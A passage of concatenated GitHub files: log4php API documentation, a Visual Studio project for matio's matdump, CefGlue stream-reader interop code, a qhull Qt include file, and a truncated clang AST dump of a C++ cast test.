class="class-table-header">Description</th> </tr> <tr> <td style="padding-right: 2em; vertical-align: top"> <a href="../../log4php/xml/LoggerDOMConfigurator.html">LoggerDOMConfigurator</a> </td> <td> Use this class to initialize the log4php environment using expat parser. </td> </tr> </table> </div> </div> <a name="sec-includes"></a> <div class="info-box"> <div class="info-box-title">Includes</div> <div class="nav-bar"> <a href="#sec-description">Description</a> | <a href="#sec-classes">Classes</a> | <span class="disabled">Includes</span> | <a href="#sec-constants">Constants</a> </div> <div class="info-box-body"> <a name="_LOG4PHP_DIR_/LoggerManager_php"><!-- --></a> <div class="evenrow"> <div> <span class="include-title"> <span class="include-type">require_once</span> (<span class="include-name">LOG4PHP_DIR.'/LoggerManager.php'</span>) (line <span class="line-number">24</span>) </span> </div> <!-- ========== Info from phpDoc block ========= --> </div> <a name="_LOG4PHP_DIR_/or/LoggerObjectRenderer_php"><!-- --></a> <div class="oddrow"> <div> <span class="include-title"> <span class="include-type">require_once</span> (<span class="include-name">LOG4PHP_DIR.'/or/LoggerObjectRenderer.php'</span>) (line <span class="line-number">19</span>) </span> </div> <!-- ========== Info from phpDoc block ========= --> </div> <a name="_LOG4PHP_DIR_/LoggerLog_php"><!-- --></a> <div class="evenrow"> <div> <span class="include-title"> <span class="include-type">require_once</span> (<span class="include-name">LOG4PHP_DIR.'/LoggerLog.php'</span>) (line <span class="line-number">23</span>) </span> </div> <!-- ========== Info from phpDoc block ========= --> </div> <a name="_LOG4PHP_DIR_/LoggerLayout_php"><!-- --></a> <div class="oddrow"> <div> <span class="include-title"> <span class="include-type">require_once</span> (<span class="include-name">LOG4PHP_DIR.'/LoggerLayout.php'</span>) (line <span class="line-number">22</span>) </span> </div> <!-- ========== Info from phpDoc block ========= --> </div> <a name="_LOG4PHP_DIR_/LoggerAppender_php"><!-- --></a> <div class="evenrow"> <div> <span class="include-title"> <span class="include-type">require_once</span> (<span class="include-name">LOG4PHP_DIR.'/LoggerAppender.php'</span>) (line <span class="line-number">21</span>) </span> </div> <!-- ========== Info from phpDoc block ========= --> </div> <a name="_LOG4PHP_DIR_/spi/LoggerConfigurator_php"><!-- --></a> <div class="oddrow"> <div> <span class="include-title"> <span class="include-type">require_once</span> (<span class="include-name">LOG4PHP_DIR.'/spi/LoggerConfigurator.php'</span>) (line <span class="line-number">20</span>) </span> </div> <!-- ========== Info from phpDoc block ========= --> </div> <a name="_LOG4PHP_DIR_/helpers/LoggerOptionConverter_php"><!-- --></a> <div class="evenrow"> <div> <span class="include-title"> <span class="include-type">require_once</span> (<span class="include-name">LOG4PHP_DIR.'/helpers/LoggerOptionConverter.php'</span>) (line <span class="line-number">18</span>) </span> </div> <!-- ========== Info from phpDoc block ========= --> </div> </div> </div> <a name="sec-constants"></a> <div class="info-box"> <div class="info-box-title">Constants</div> <div class="nav-bar"> <a href="#sec-description">Description</a> | <a href="#sec-classes">Classes</a> | <a href="#sec-includes">Includes</a> | <span class="disabled">Constants</span> </div> <div class="info-box-body"> <a name="defineLOG4PHP_LOGGER_DOM_CONFIGURATOR_APPENDER_STATE"><!-- --></a> <div class="oddrow"> <div> <span class="const-title"> <span class="const-name">LOG4PHP_LOGGER_DOM_CONFIGURATOR_APPENDER_STATE</span> = 1000 (line <span class="line-number">26</span>) </span> </div> <!-- ========== Info from phpDoc block ========= --> </div> <a name="defineLOG4PHP_LOGGER_DOM_CONFIGURATOR_DEFAULT_CONFIGURATION"><!-- --></a> <div class="evenrow"> <div> <span class="const-title"> <span class="const-name">LOG4PHP_LOGGER_DOM_CONFIGURATOR_DEFAULT_CONFIGURATION</span> = '&lt;?xml version=&quot;1.0&quot; ?&gt;<br />&lt;log4php:configuration threshold=&quot;all&quot;&gt;<br /> &lt;appender name=&quot;A1&quot; class=&quot;LoggerAppenderEcho&quot;&gt;<br /> &lt;layout class=&quot;LoggerLayoutSimple&quot; /&gt;<br /> &lt;/appender&gt;<br /> &lt;root&gt;<br /> &lt;level value=&quot;debug&quot; /&gt;<br /> &lt;appender_ref ref=&quot;A1&quot; /&gt;<br /> &lt;/root&gt;<br />&lt;/log4php:configuration&gt;' (line <span class="line-number">37</span>) </span> </div> <!-- ========== Info from phpDoc block ========= --> <ul class="tags"> <li><span class="field">var:</span> the default configuration document</li> </ul> </div> <a name="defineLOG4PHP_LOGGER_DOM_CONFIGURATOR_DEFAULT_FILENAME"><!-- --></a> <div class="oddrow"> <div> <span class="const-title"> <span class="const-name">LOG4PHP_LOGGER_DOM_CONFIGURATOR_DEFAULT_FILENAME</span> = './log4php.xml' (line <span class="line-number">32</span>) </span> </div> <!-- ========== Info from phpDoc block ========= --> </div> <a name="defineLOG4PHP_LOGGER_DOM_CONFIGURATOR_FILTER_STATE"><!-- --></a> <div class="evenrow"> <div> <span class="const-title"> <span class="const-name">LOG4PHP_LOGGER_DOM_CONFIGURATOR_FILTER_STATE</span> = 1040 (line <span class="line-number">30</span>) </span> </div> <!-- ========== Info from phpDoc block ========= --> </div> <a name="defineLOG4PHP_LOGGER_DOM_CONFIGURATOR_LAYOUT_STATE"><!-- --></a> <div class="oddrow"> <div> <span class="const-title"> <span class="const-name">LOG4PHP_LOGGER_DOM_CONFIGURATOR_LAYOUT_STATE</span> = 1010 (line <span class="line-number">27</span>) </span> </div> <!-- ========== Info from phpDoc block ========= --> </div> <a name="defineLOG4PHP_LOGGER_DOM_CONFIGURATOR_LOGGER_STATE"><!-- --></a> <div class="evenrow"> <div> <span class="const-title"> <span class="const-name">LOG4PHP_LOGGER_DOM_CONFIGURATOR_LOGGER_STATE</span> = 1030 (line <span class="line-number">29</span>) </span> </div> <!-- ========== Info from phpDoc block ========= --> </div> <a name="defineLOG4PHP_LOGGER_DOM_CONFIGURATOR_ROOT_STATE"><!-- --></a> <div class="oddrow"> <div> <span class="const-title"> <span class="const-name">LOG4PHP_LOGGER_DOM_CONFIGURATOR_ROOT_STATE</span> = 1020 (line <span class="line-number">28</span>) </span> </div> <!-- ========== Info from phpDoc block ========= --> </div> <a name="defineLOG4PHP_LOGGER_DOM_CONFIGURATOR_XMLNS"><!-- --></a> <div class="evenrow"> <div> <span class="const-title"> <span class="const-name">LOG4PHP_LOGGER_DOM_CONFIGURATOR_XMLNS</span> = 'HTTP://LOGGING.APACHE.ORG/LOG4PHP/' (line <span class="line-number">52</span>) </span> </div> <!-- ========== Info from phpDoc block ========= --> <ul class="tags"> <li><span class="field">var:</span> the elements namespace</li> </ul> </div> </div> </div> <p class="notes" id="credit"> Documentation generated by <a href="http://www.phpdoc.org" target="_blank">phpDocumentor 1.3.2</a> </p> </div></body> </html>
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="Windows-1252"?> <VisualStudioProject ProjectType="Visual C++" Version="9.00" Name="matdump" ProjectGUID="{F85AD892-CF1E-47B7-BC7D-ED00BCA859C0}" RootNamespace="matdump" Keyword="Win32Proj" TargetFrameworkVersion="196613" > <Platforms> <Platform Name="Win32" /> <Platform Name="x64" /> </Platforms> <ToolFiles> </ToolFiles> <Configurations> <Configuration Name="Debug|Win32" OutputDirectory="$(SolutionDir)$(ConfigurationName)" IntermediateDirectory="$(ConfigurationName)" ConfigurationType="1" CharacterSet="1" > <Tool Name="VCPreBuildEventTool" /> <Tool Name="VCCustomBuildTool" /> <Tool Name="VCXMLDataGeneratorTool" /> <Tool Name="VCWebServiceProxyGeneratorTool" /> <Tool Name="VCMIDLTool" /> <Tool Name="VCCLCompilerTool" Optimization="0" AdditionalIncludeDirectories="&quot;$(SolutionDir)&quot;;&quot;$(SolutionDir)/../getopt&quot;;&quot;$(SolutionDir)/../src&quot;" PreprocessorDefinitions="REPLACE_GETOPT" MinimalRebuild="true" BasicRuntimeChecks="3" RuntimeLibrary="3" UsePrecompiledHeader="0" WarningLevel="3" DebugInformationFormat="4" /> <Tool Name="VCManagedResourceCompilerTool" /> <Tool Name="VCResourceCompilerTool" /> <Tool Name="VCPreLinkEventTool" /> <Tool Name="VCLinkerTool" AdditionalDependencies="libmatio.lib" LinkIncremental="1" AdditionalLibraryDirectories="$(SolutionDir)$(ConfigurationName)" GenerateDebugInformation="true" SubSystem="1" TargetMachine="1" /> <Tool Name="VCALinkTool" /> <Tool Name="VCManifestTool" /> <Tool Name="VCXDCMakeTool" /> <Tool Name="VCBscMakeTool" /> <Tool Name="VCFxCopTool" /> <Tool Name="VCAppVerifierTool" /> <Tool Name="VCPostBuildEventTool" /> </Configuration> <Configuration Name="Debug|x64" OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)" IntermediateDirectory="$(PlatformName)\$(ConfigurationName)" ConfigurationType="1" CharacterSet="1" > <Tool Name="VCPreBuildEventTool" /> <Tool Name="VCCustomBuildTool" /> <Tool Name="VCXMLDataGeneratorTool" /> <Tool Name="VCWebServiceProxyGeneratorTool" /> <Tool Name="VCMIDLTool" TargetEnvironment="3" /> <Tool Name="VCCLCompilerTool" Optimization="0" AdditionalIncludeDirectories="&quot;$(HDF5_DIR)/include&quot;;&quot;$(SolutionDir)&quot;;&quot;$(SolutionDir)/../getopt&quot;;&quot;$(SolutionDir)/../src&quot;" PreprocessorDefinitions="REPLACE_GETOPT;MAT73=1;HAVE_HDF5=1;HAVE_ZLIB=1;_HDF5USEDLL_" MinimalRebuild="true" BasicRuntimeChecks="3" RuntimeLibrary="2" UsePrecompiledHeader="0" WarningLevel="3" DebugInformationFormat="3" /> <Tool Name="VCManagedResourceCompilerTool" /> <Tool Name="VCResourceCompilerTool" /> <Tool Name="VCPreLinkEventTool" /> <Tool Name="VCLinkerTool" AdditionalDependencies="libmatio.lib" LinkIncremental="2" AdditionalLibraryDirectories="$(SolutionDir)$(PlatformName)\$(ConfigurationName)" GenerateDebugInformation="true" SubSystem="1" TargetMachine="17" /> <Tool Name="VCALinkTool" /> <Tool Name="VCManifestTool" /> <Tool Name="VCXDCMakeTool" /> <Tool Name="VCBscMakeTool" /> <Tool Name="VCFxCopTool" /> <Tool Name="VCAppVerifierTool" /> <Tool Name="VCPostBuildEventTool" /> </Configuration> <Configuration Name="Release|Win32" OutputDirectory="$(SolutionDir)$(ConfigurationName)" IntermediateDirectory="$(ConfigurationName)" ConfigurationType="1" CharacterSet="1" WholeProgramOptimization="1" > <Tool Name="VCPreBuildEventTool" /> <Tool Name="VCCustomBuildTool" /> <Tool Name="VCXMLDataGeneratorTool" /> <Tool Name="VCWebServiceProxyGeneratorTool" /> <Tool Name="VCMIDLTool" /> <Tool Name="VCCLCompilerTool" Optimization="2" EnableIntrinsicFunctions="true" AdditionalIncludeDirectories="&quot;$(SolutionDir)&quot;;&quot;$(SolutionDir)/../getopt&quot;;&quot;$(SolutionDir)/../src&quot;" PreprocessorDefinitions="_CRT_SECURE_NO_WARNINGS;REPLACE_GETOPT" RuntimeLibrary="2" EnableFunctionLevelLinking="true" UsePrecompiledHeader="0" WarningLevel="3" DebugInformationFormat="3" /> <Tool Name="VCManagedResourceCompilerTool" /> <Tool Name="VCResourceCompilerTool" /> <Tool Name="VCPreLinkEventTool" /> <Tool Name="VCLinkerTool" AdditionalDependencies="libmatio.lib" LinkIncremental="1" AdditionalLibraryDirectories="$(SolutionDir)$(ConfigurationName)" EnableUAC="false" GenerateDebugInformation="false" SubSystem="1" OptimizeReferences="2" EnableCOMDATFolding="2" TargetMachine="1" /> <Tool Name="VCALinkTool" /> <Tool Name="VCManifestTool" /> <Tool Name="VCXDCMakeTool" /> <Tool Name="VCBscMakeTool" /> <Tool Name="VCFxCopTool" /> <Tool Name="VCAppVerifierTool" /> <Tool Name="VCPostBuildEventTool" /> </Configuration> <Configuration Name="Release|x64" OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)" IntermediateDirectory="$(PlatformName)\$(ConfigurationName)" ConfigurationType="1" CharacterSet="1" WholeProgramOptimization="1" > <Tool Name="VCPreBuildEventTool" /> <Tool Name="VCCustomBuildTool" /> <Tool Name="VCXMLDataGeneratorTool" /> <Tool Name="VCWebServiceProxyGeneratorTool" /> <Tool Name="VCMIDLTool" TargetEnvironment="3" /> <Tool Name="VCCLCompilerTool" Optimization="2" EnableIntrinsicFunctions="true" PreprocessorDefinitions="_CRT_SECURE_NO_WARNINGS;REPLACE_GETOPT" RuntimeLibrary="2" EnableFunctionLevelLinking="true" UsePrecompiledHeader="0" WarningLevel="3" DebugInformationFormat="3" /> <Tool Name="VCManagedResourceCompilerTool" /> <Tool Name="VCResourceCompilerTool" /> <Tool Name="VCPreLinkEventTool" /> <Tool Name="VCLinkerTool" AdditionalDependencies="libmatio.lib" LinkIncremental="1" AdditionalLibraryDirectories="$(SolutionDir)$(PlatformName)\$(ConfigurationName)" GenerateDebugInformation="true" SubSystem="1" OptimizeReferences="2" EnableCOMDATFolding="2" TargetMachine="17" /> <Tool Name="VCALinkTool" /> <Tool Name="VCManifestTool" /> <Tool Name="VCXDCMakeTool" /> <Tool Name="VCBscMakeTool" /> <Tool Name="VCFxCopTool" /> <Tool Name="VCAppVerifierTool" /> <Tool Name="VCPostBuildEventTool" /> </Configuration> </Configurations> <References> </References> <Files> <Filter Name="Source Files" Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx" UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}" > <File RelativePath="..\..\getopt\getopt_long.c" > </File> <File RelativePath="..\..\tools\matdump.c" > </File> </Filter> <Filter Name="Header Files" Filter="h;hpp;hxx;hm;inl;inc;xsd" UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}" > <File RelativePath="..\..\getopt\getopt.h" > </File> </Filter> <Filter Name="Resource Files" Filter="rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav" UniqueIdentifier="{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}" > </Filter> </Files> <Globals> </Globals> </VisualStudioProject>
{ "pile_set_name": "Github" }
// // DO NOT MODIFY! THIS IS AUTOGENERATED FILE! // namespace Xilium.CefGlue.Interop { using System; using System.Diagnostics.CodeAnalysis; using System.Runtime.InteropServices; using System.Security; [StructLayout(LayoutKind.Sequential, Pack = libcef.ALIGN)] [SuppressMessage("Microsoft.Design", "CA1049:TypesThatOwnNativeResourcesShouldBeDisposable")] internal unsafe struct cef_stream_reader_t { internal cef_base_ref_counted_t _base; internal IntPtr _read; internal IntPtr _seek; internal IntPtr _tell; internal IntPtr _eof; internal IntPtr _may_block; // CreateForFile [DllImport(libcef.DllName, EntryPoint = "cef_stream_reader_create_for_file", CallingConvention = libcef.CEF_CALL)] public static extern cef_stream_reader_t* create_for_file(cef_string_t* fileName); // CreateForData [DllImport(libcef.DllName, EntryPoint = "cef_stream_reader_create_for_data", CallingConvention = libcef.CEF_CALL)] public static extern cef_stream_reader_t* create_for_data(void* data, UIntPtr size); // CreateForHandler [DllImport(libcef.DllName, EntryPoint = "cef_stream_reader_create_for_handler", CallingConvention = libcef.CEF_CALL)] public static extern cef_stream_reader_t* create_for_handler(cef_read_handler_t* handler); [UnmanagedFunctionPointer(libcef.CEF_CALLBACK)] #if !DEBUG [SuppressUnmanagedCodeSecurity] #endif private delegate void add_ref_delegate(cef_stream_reader_t* self); [UnmanagedFunctionPointer(libcef.CEF_CALLBACK)] #if !DEBUG [SuppressUnmanagedCodeSecurity] #endif private delegate int release_delegate(cef_stream_reader_t* self); [UnmanagedFunctionPointer(libcef.CEF_CALLBACK)] #if !DEBUG [SuppressUnmanagedCodeSecurity] #endif private delegate int has_one_ref_delegate(cef_stream_reader_t* self); [UnmanagedFunctionPointer(libcef.CEF_CALLBACK)] #if !DEBUG [SuppressUnmanagedCodeSecurity] #endif private delegate int has_at_least_one_ref_delegate(cef_stream_reader_t* self); [UnmanagedFunctionPointer(libcef.CEF_CALLBACK)] #if !DEBUG [SuppressUnmanagedCodeSecurity] #endif private delegate UIntPtr read_delegate(cef_stream_reader_t* self, void* ptr, UIntPtr size, UIntPtr n); [UnmanagedFunctionPointer(libcef.CEF_CALLBACK)] #if !DEBUG [SuppressUnmanagedCodeSecurity] #endif private delegate int seek_delegate(cef_stream_reader_t* self, long offset, int whence); [UnmanagedFunctionPointer(libcef.CEF_CALLBACK)] #if !DEBUG [SuppressUnmanagedCodeSecurity] #endif private delegate long tell_delegate(cef_stream_reader_t* self); [UnmanagedFunctionPointer(libcef.CEF_CALLBACK)] #if !DEBUG [SuppressUnmanagedCodeSecurity] #endif private delegate int eof_delegate(cef_stream_reader_t* self); [UnmanagedFunctionPointer(libcef.CEF_CALLBACK)] #if !DEBUG [SuppressUnmanagedCodeSecurity] #endif private delegate int may_block_delegate(cef_stream_reader_t* self); // AddRef private static IntPtr _p0; private static add_ref_delegate _d0; public static void add_ref(cef_stream_reader_t* self) { add_ref_delegate d; var p = self->_base._add_ref; if (p == _p0) { d = _d0; } else { d = (add_ref_delegate)Marshal.GetDelegateForFunctionPointer(p, typeof(add_ref_delegate)); if (_p0 == IntPtr.Zero) { _d0 = d; _p0 = p; } } d(self); } // Release private static IntPtr _p1; private static release_delegate _d1; public static int release(cef_stream_reader_t* self) { release_delegate d; var p = self->_base._release; if (p == _p1) { d = _d1; } else { d = (release_delegate)Marshal.GetDelegateForFunctionPointer(p, typeof(release_delegate)); if (_p1 == IntPtr.Zero) { _d1 = d; _p1 = p; } } return d(self); } // HasOneRef private static IntPtr _p2; private static has_one_ref_delegate _d2; public static int has_one_ref(cef_stream_reader_t* self) { has_one_ref_delegate d; var p = self->_base._has_one_ref; if (p == _p2) { d = _d2; } else { d = (has_one_ref_delegate)Marshal.GetDelegateForFunctionPointer(p, typeof(has_one_ref_delegate)); if (_p2 == IntPtr.Zero) { _d2 = d; _p2 = p; } } return d(self); } // HasAtLeastOneRef private static IntPtr _p3; private static has_at_least_one_ref_delegate _d3; public static int has_at_least_one_ref(cef_stream_reader_t* self) { has_at_least_one_ref_delegate d; var p = self->_base._has_at_least_one_ref; if (p == _p3) { d = _d3; } else { d = (has_at_least_one_ref_delegate)Marshal.GetDelegateForFunctionPointer(p, typeof(has_at_least_one_ref_delegate)); if (_p3 == IntPtr.Zero) { _d3 = d; _p3 = p; } } return d(self); } // Read private static IntPtr _p4; private static read_delegate _d4; public static UIntPtr read(cef_stream_reader_t* self, void* ptr, UIntPtr size, UIntPtr n) { read_delegate d; var p = self->_read; if (p == _p4) { d = _d4; } else { d = (read_delegate)Marshal.GetDelegateForFunctionPointer(p, typeof(read_delegate)); if (_p4 == IntPtr.Zero) { _d4 = d; _p4 = p; } } return d(self, ptr, size, n); } // Seek private static IntPtr _p5; private static seek_delegate _d5; public static int seek(cef_stream_reader_t* self, long offset, int whence) { seek_delegate d; var p = self->_seek; if (p == _p5) { d = _d5; } else { d = (seek_delegate)Marshal.GetDelegateForFunctionPointer(p, typeof(seek_delegate)); if (_p5 == IntPtr.Zero) { _d5 = d; _p5 = p; } } return d(self, offset, whence); } // Tell private static IntPtr _p6; private static tell_delegate _d6; public static long tell(cef_stream_reader_t* self) { tell_delegate d; var p = self->_tell; if (p == _p6) { d = _d6; } else { d = (tell_delegate)Marshal.GetDelegateForFunctionPointer(p, typeof(tell_delegate)); if (_p6 == IntPtr.Zero) { _d6 = d; _p6 = p; } } return d(self); } // Eof private static IntPtr _p7; private static eof_delegate _d7; public static int eof(cef_stream_reader_t* self) { eof_delegate d; var p = self->_eof; if (p == _p7) { d = _d7; } else { d = (eof_delegate)Marshal.GetDelegateForFunctionPointer(p, typeof(eof_delegate)); if (_p7 == IntPtr.Zero) { _d7 = d; _p7 = p; } } return d(self); } // MayBlock private static IntPtr _p8; private static may_block_delegate _d8; public static int may_block(cef_stream_reader_t* self) { may_block_delegate d; var p = self->_may_block; if (p == _p8) { d = _d8; } else { d = (may_block_delegate)Marshal.GetDelegateForFunctionPointer(p, typeof(may_block_delegate)); if (_p8 == IntPtr.Zero) { _d8 = d; _p8 = p; } } return d(self); } } }
{ "pile_set_name": "Github" }
# ------------------------------------------------- # qhull-libqhull-src_r.pri -- Qt include project for libqhull_r sources and headers # # It uses reentrant Qhull # ------------------------------------------------- # Order object files by frequency of execution. Small files at end. # Current directory is caller # libqhull_r/libqhull_r.pro and ../qhull-libqhull-src_r.pri have the same SOURCES and HEADERS SOURCES += ../libqhull_r/global_r.c SOURCES += ../libqhull_r/stat_r.c SOURCES += ../libqhull_r/geom2_r.c SOURCES += ../libqhull_r/poly2_r.c SOURCES += ../libqhull_r/merge_r.c SOURCES += ../libqhull_r/libqhull_r.c SOURCES += ../libqhull_r/geom_r.c SOURCES += ../libqhull_r/poly_r.c SOURCES += ../libqhull_r/qset_r.c SOURCES += ../libqhull_r/mem_r.c SOURCES += ../libqhull_r/random_r.c SOURCES += ../libqhull_r/usermem_r.c SOURCES += ../libqhull_r/userprintf_r.c SOURCES += ../libqhull_r/io_r.c SOURCES += ../libqhull_r/user_r.c SOURCES += ../libqhull_r/rboxlib_r.c SOURCES += ../libqhull_r/userprintf_rbox_r.c HEADERS += ../libqhull_r/geom_r.h HEADERS += ../libqhull_r/io_r.h HEADERS += ../libqhull_r/libqhull_r.h HEADERS += ../libqhull_r/mem_r.h HEADERS += ../libqhull_r/merge_r.h HEADERS += ../libqhull_r/poly_r.h HEADERS += ../libqhull_r/random_r.h HEADERS += ../libqhull_r/qhull_ra.h HEADERS += ../libqhull_r/qset_r.h HEADERS += ../libqhull_r/stat_r.h HEADERS += ../libqhull_r/user_r.h
{ "pile_set_name": "Github" }
<"TranslationUnitDecl" : ( { "pointer" : 1, "source_range" : ( { }, { } ) }, [ <"TypedefDecl" : ( { "pointer" : 2, "source_range" : ( { }, { } ), "is_implicit" : true }, { "name" : "__int128_t", "qual_name" : [ "__int128_t" ] }, 0, { } )>, <"TypedefDecl" : ( { "pointer" : 3, "source_range" : ( { }, { } ), "is_implicit" : true }, { "name" : "__uint128_t", "qual_name" : [ "__uint128_t" ] }, 0, { } )>, <"TypedefDecl" : ( { "pointer" : 4, "source_range" : ( { }, { } ), "is_implicit" : true }, { "name" : "__NSConstantString", "qual_name" : [ "__NSConstantString" ] }, 0, { } )>, <"TypedefDecl" : ( { "pointer" : 5, "source_range" : ( { }, { } ), "is_implicit" : true }, { "name" : "__builtin_ms_va_list", "qual_name" : [ "__builtin_ms_va_list" ] }, 0, { } )>, <"TypedefDecl" : ( { "pointer" : 6, "source_range" : ( { }, { } ), "is_implicit" : true }, { "name" : "__builtin_va_list", "qual_name" : [ "__builtin_va_list" ] }, 0, { } )>, <"VarDecl" : ( { "pointer" : 7, "source_range" : ( { "file" : "tests/c_cast.cpp", "line" : 7, "column" : 1 }, { "column" : 9 } ), "is_used" : true, "is_this_declaration_referenced" : true }, { "name" : "i", "qual_name" : [ "i" ] }, { "type_ptr" : 8 }, { "is_global" : true, "init_expr" : <"IntegerLiteral" : ( { "pointer" : 9, "source_range" : ( { "column" : 9 }, { "column" : 9 } ) }, [ ], { "qual_type" : { "type_ptr" : 8 } }, { "is_signed" : true, "bitwidth" : 32, "value" : "10" } )> } )>, <"VarDecl" : ( { "pointer" : 10, "source_range" : ( { "line" : 8, "column" : 1 }, { "column" : 16 } ) }, { "name" : "l", "qual_name" : [ "l" ] }, { "type_ptr" : 11 }, { "is_global" : true, "init_expr" : <"CStyleCastExpr" : ( { "pointer" : 12, "source_range" : ( { "column" : 10 }, { "column" : 16 } ) }, [ <"ImplicitCastExpr" : ( { "pointer" : 13, "source_range" : ( { "column" : 16 }, { "column" : 16 } ) }, [ <"ImplicitCastExpr" : ( { "pointer" : 14, "source_range" : ( { "column" : 16 }, { "column" : 16 } ) }, [ <"DeclRefExpr" : ( { "pointer" : 15, "source_range" : ( { "column" : 16 }, { "column" : 16 } ) }, [ ], { "qual_type" : { "type_ptr" : 8 }, "value_kind" : <"LValue"> }, { "decl_ref" : { "kind" : <"Var">, "decl_pointer" : 7, "name" : { "name" : "i", "qual_name" : [ "i" ] }, "qual_type" : { "type_ptr" : 8 } } } )> ], { "qual_type" : { "type_ptr" : 8 } }, { "cast_kind" : <"LValueToRValue">, "base_path" : [ ] } )> ], { "qual_type" : { "type_ptr" : 11 } }, { "cast_kind" : <"IntegralCast">, "base_path" : [ ] } )> ], { "qual_type" : { "type_ptr" : 11 } }, { "cast_kind" : <"NoOp">, "base_path" : [ ] }, { "type_ptr" : 11 } )> } )>, <"VarDecl" : ( { "pointer" : 16, "source_range" : ( { "line" : 9, "column" : 1 }, { "column" : 16 } ) }, { "name" : "m", "qual_name" : [ "m" ] }, { "type_ptr" : 11 }, { "is_global" : true, "init_expr" : <"CXXFunctionalCastExpr" : ( { "pointer" : 17, "source_range" : ( { "column" : 10 }, { "column" : 16 } ) }, [ <"ImplicitCastExpr" : ( { "pointer" : 18, "source_range" : ( { "column" : 15 }, { "column" : 15 } ) }, [ <"ImplicitCastExpr" : ( { "pointer" : 19, "source_range" : ( { "column" : 15 }, { "column" : 15 } ) }, [ <"DeclRefExpr" : ( { "pointer" : 20, "source_range" : ( { "column" : 15 }, { "column" : 15 } ) }, [ ], { "qual_type" : { "type_ptr" : 8 }, "value_kind" : <"LValue"> }, { "decl_ref" : { "kind" : <"Var">, "decl_pointer" : 7, "name" : { "name" : "i", "qual_name" : [ "i" ] }, "qual_type" : { "type_ptr" : 8 } } } )> ], { "qual_type" : { "type_ptr" : 8 } }, { "cast_kind" : <"LValueToRValue">, "base_path" : [ ] } )> ], { "qual_type" : { "type_ptr" : 11 } }, { "cast_kind" : <"IntegralCast">, "base_path" : [ ] } )> ], { "qual_type" : { "type_ptr" : 11 } }, { "cast_kind" : <"NoOp">, "base_path" : [ ] }, { "type_ptr" : 11 } )> } )>, <"TypedefDecl" : ( { "pointer" : 21, "source_range" : ( { }, { } ), "is_implicit" : true }, { "name" : "instancetype", "qual_name" : [ "instancetype" ] }, 22, { } )> ], { }, { "input_path" : "tests/c_cast.cpp", "input_kind" : <"IK_CXX">, "integer_type_widths" : { "char_type" : 8, "short_type" : 16, "int_type" : 32, "long_type" : 64, "longlong_type" : 64 }, "types" : [ <"BuiltinType" : ( { "pointer" : 23 }, <"Void"> )>, <"BuiltinType" : ( { "pointer" : 24 }, <"Bool"> )>, <"BuiltinType" : ( { "pointer" : 25 }, <"Char_S"> )>, <"BuiltinType" : ( { "pointer" : 26 }, <"SChar"> )>, <"BuiltinType" : ( { "pointer" : 27 }, <"Short"> )>, <"BuiltinType" : ( { "pointer" : 8 }, <"Int"> )>, <"BuiltinType" : ( { "pointer" : 11 }, <"Long"> )>, <"BuiltinType" : ( { "pointer" : 28 }, <"LongLong"> )>, <"BuiltinType" : ( { "pointer" : 29 }, <"UChar"> )>, <"BuiltinType" : ( { "pointer" : 30 }, <"UShort"> )>, <"BuiltinType" : ( { "pointer" : 31 }, <"UInt"> )>, <"BuiltinType" : ( { "pointer" : 32 }, <"ULong"> )>, <"BuiltinType" : ( { "pointer" : 33 }, <"ULongLong"> )>, <"BuiltinType" : ( { "pointer" : 34 }, <"Float"> )>, <"BuiltinType" : ( { "pointer" : 35 }, <"Double"> )>, <"BuiltinType" : ( { "pointer" : 36 }, <"LongDouble"> )>, <"BuiltinType" : ( { "pointer" : 37 }, <"Float128"> )>, <"BuiltinType" : ( { "pointer" : 38 }, <"Float16"> )>, <"BuiltinType" : ( { "pointer" : 39 }, <"ShortAccum"> )>, <"BuiltinType" : ( { "pointer" : 40 }, <"Accum"> )>, <"BuiltinType" : ( { "pointer" : 41 }, <"LongAccum"> )>, <"BuiltinType" : ( { "pointer" : 42 }, <"UShortAccum"> )>, <"BuiltinType" : ( { "pointer" : 43 }, <"UAccum"> )>, <"BuiltinType" : ( { "pointer" : 44 }, <"ULongAccum"> )>, <"BuiltinType" : ( { "pointer" : 45 }, <"ShortFract"> )>, <"BuiltinType" : ( { "pointer" : 46 }, <"Fract"> )>, <"BuiltinType" : ( { "pointer" : 47 }, <"LongFract"> )>, <"BuiltinType" : ( { "pointer" : 48 }, <"UShortFract"> )>, <"BuiltinType" : ( { "pointer" : 49 }, <"UFract"> )>, <"BuiltinType" : ( { "pointer" : 50 }, <"ULongFract"> )>, <"BuiltinType" : ( { "pointer" : 51 }, <"SatShortAccum"> )>, <"BuiltinType" : ( { "pointer" : 52 }, <"SatAccum"> )>, <"BuiltinType" : ( { "pointer" : 53 }, <"SatLongAccum"> )>, <"BuiltinType" : ( { "pointer" : 54 }, <"SatUShortAccum"> )>, <"BuiltinType" : ( { "pointer" : 55 }, <"SatUAccum"> )>, <"BuiltinType" : ( { "pointer" : 56 }, <"SatULongAccum"> )>, <"BuiltinType" : ( { "pointer" : 57 }, <"SatShortFract"> )>, <"BuiltinType" : ( { "pointer" : 58 }, <"SatFract"> )>, <"BuiltinType" : ( { "pointer" : 59 }, <"SatLongFract"> )>, <"BuiltinType" : ( { "pointer" : 60 }, <"SatUShortFract"> )>, <"BuiltinType" : ( { "pointer" : 61 }, <"SatUFract"> )>, <"BuiltinType" : ( { "pointer" : 62 }, <"SatULongFract"> )>, <"BuiltinType" : ( { "pointer" : 63 }, <"Int128"> )>, <"BuiltinType" : ( { "pointer" : 64 }, <"UInt128"> )>, <"BuiltinType" : ( { "pointer" : 65 }, <"WChar_S"> )>, <"BuiltinType" : ( { "pointer" : 66 }, <"Char8"> )>, <"BuiltinType" : ( { "pointer" : 67 }, <"Char16"> )>, <"BuiltinType" : ( { "pointer" : 68 }, <"Char32"> )>, <"BuiltinType" : ( { "pointer" : 69 }, <"Dependent"> )>, <"BuiltinType" : ( { "pointer" : 70 }, <"Overload"> )>, <"BuiltinType" : ( { "pointer" : 71 }, <"BoundMember"> )>, <"BuiltinType" : ( { "pointer" : 72 }, <"PseudoObject"> )>, <"BuiltinType" : ( { "pointer" : 73 }, <"UnknownAny"> )>, <"BuiltinType" : ( { 